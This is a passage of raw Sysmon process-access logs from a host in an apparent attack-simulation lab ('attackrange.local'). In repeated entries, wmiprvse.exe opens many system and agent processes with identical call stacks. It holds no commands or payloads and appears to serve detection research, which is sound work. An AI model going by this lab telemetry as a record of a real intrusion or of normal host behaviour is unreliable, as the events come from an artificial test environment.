Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025536Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025535Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025534Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025533Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025532Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025531Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025530Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025529Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025528Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025527Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025526Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025525Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025524Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025523Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025522Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025521Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025520Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025519Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025518Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.538{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025517Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 